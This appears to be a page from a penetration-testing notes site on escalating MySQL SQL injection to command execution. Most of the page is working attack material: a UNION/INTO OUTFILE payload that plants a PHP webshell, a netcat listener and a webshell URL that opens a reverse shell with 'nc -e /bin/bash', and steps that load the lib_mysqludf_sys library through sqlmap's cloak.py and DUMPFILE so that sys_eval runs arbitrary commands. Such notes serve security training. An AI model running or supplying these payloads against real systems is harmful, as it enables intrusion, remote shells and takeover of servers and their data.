Webshell and UDF
If we have write permission, we can use UNION attack and
INTO OUTFILE to create a PHP webshell on the target system:SELECT username,password FROM users WHERE id = '1' UNION SELECT 1,'<?php system($_GET["cmd"]);?>' INTO OUTFILE '/var/www/html/images/webshell.php';
Here we choose the
images directory since it is usually owned by the www-data user, not root.Once the webshell is created successfully, we can spawn a netcat reverse shell. Start a listener on our local machine:
nc -nvlp 443
Spawn a netcat reverse shell using the webshell:
http://127.0.0.1/images/webshell.php?cmd=nc -e /bin/bash <local_ip> 443
There is a plugin
lib_mysqludf_sys which contains the following dangerous functions:sys_eval(): executes any command and returns the resultsys_exec(): executes any command and returns the return codesys_get(): gets an environment variablesys_set(): creates or modifies an environment variable
MySQL does not have this lib by default. In order to use these functions, we have to import
lib_mysqludf_sys first. Generate a binary version of this lib using sqlmap cloak.py:cd sqlmap/extra/cloak
python3 cloak.py -d -i ../../data/udf/mysql/linux/32/lib_mysqludf_sys.so_ -o lib_mysqludf_sys.so
Grab its content as hex:
xxd -ps lib_mysqludf_sys.so
Connect to MySQL. In the MySQL shell, copy and paste the hex data and
unhex() it:SELECT unhex('<hex_data_in_lib_linux.so>') INTO DUMPFILE '/usr/lib/mysql/plugin/lib_mysqludf_sys.so
Here we use
DUMPFILE instead OUTFILE since DUMPFILE outputs a unmodified binary file while OUTFILE adds newlines and escapes some special characters.Exports the
sys_eval() function from lib_mysqludf_sys.so:CREATE FUNCTION sys_eval returns string soname "lib_mysqludf_sys.so"
At this stage we can execute any command using the
sys_eval() function:SELECT sys_eval('id');
Last modified 10mo ago